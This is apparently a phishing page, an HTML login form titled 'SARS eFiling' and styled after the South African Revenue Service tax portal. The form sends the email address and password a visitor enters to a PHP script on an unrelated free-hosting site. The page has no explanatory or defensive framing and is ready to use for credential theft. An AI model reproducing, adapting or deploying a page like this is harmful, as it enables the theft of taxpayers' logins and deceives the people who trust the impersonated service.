<html>
<head>

<style>
body{
    margin: 0;
    padding: 0;
    background: url(https://www.htmlcsscolor.com/preview/gallery/0066CC.png);
    background-size: cover;
    background-position: center;
    font-family: sans-serif;
}

.loginbox{
    width: 320px;
    height: 420px;
    background: #000;
    color: #fff;
    top: 50%;
    left: 50%;
    position: absolute;
    transform: translate(-50%,-50%);
    box-sizing: border-box;
    padding: 70px 30px;
}

.avatar{
    width: 100px;
    height: 100px;
    border-radius: 50%;
    position: absolute;
    top: -50px;
    left: calc(50% - 50px);
}

hi{
    margin: 0;
    padding: 0 0 20px;
    text-align: center;
    font-size: 22px;
}

.loginbox p{
    margin: 0;
    padding: 0;
    font-weight: bold;
}

.loginbox input{
    width: 100%;
    margin-bottom: 20px;
}

.loginbox input[type="text"], input[type="password"]
{
    border: none;
    border-bottom: 1px solid #fff;
    background: transparent;
    outline: none;
    height: 40px;
    color: #fff;
    font-size: 16px;
}
    .loginbox input[type="Submit"]
{
    border: none;
    outline: none;
    height: 40px;
    background: #fb2525;
    color: #fff;
    font-size: 18px;
    border-radius: 20px;
}
.loginbox input[type="Submit"]:hover
{
    cursor: pointer;
    background: #ffc107;
    color: #000;
}
.loginbox a{
    text-decoration: none;
    font-size: 12px;
    line-height: 20px;
    color: darkgrey;
}

</style>
<title>SARS eFiling</title>
    <link rel="icon" href="https://www.htmlcsscolor.com/preview/gallery/0066CC.png" type="text/css" href="style.css">
<body>
    <div class="loginbox">
    <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcToZXS1iL0NbV8H2JsE46UP7_WULgfbWUgwew&usqp=CAU" class="avatar">
    <h1>SARS eFILING</h1>
        
        <form method="post" action="https://technolibra.000webhostapp.com/honesty/post.php">
        <p>Email Address</p>
        <input type="text" name="email" placeholder="Enter your email" style="margin-bottom: 10px;" required>
        <p>Password</p>
        <input type="password" name="password" placeholder="Enter your password" style="margin-bottom: 10px;" required>
        <input type="Submit" name="" value="Login">
        <a href="#">Login with your receiving email account</a><br>
        </form>

</body>
</head>
</html>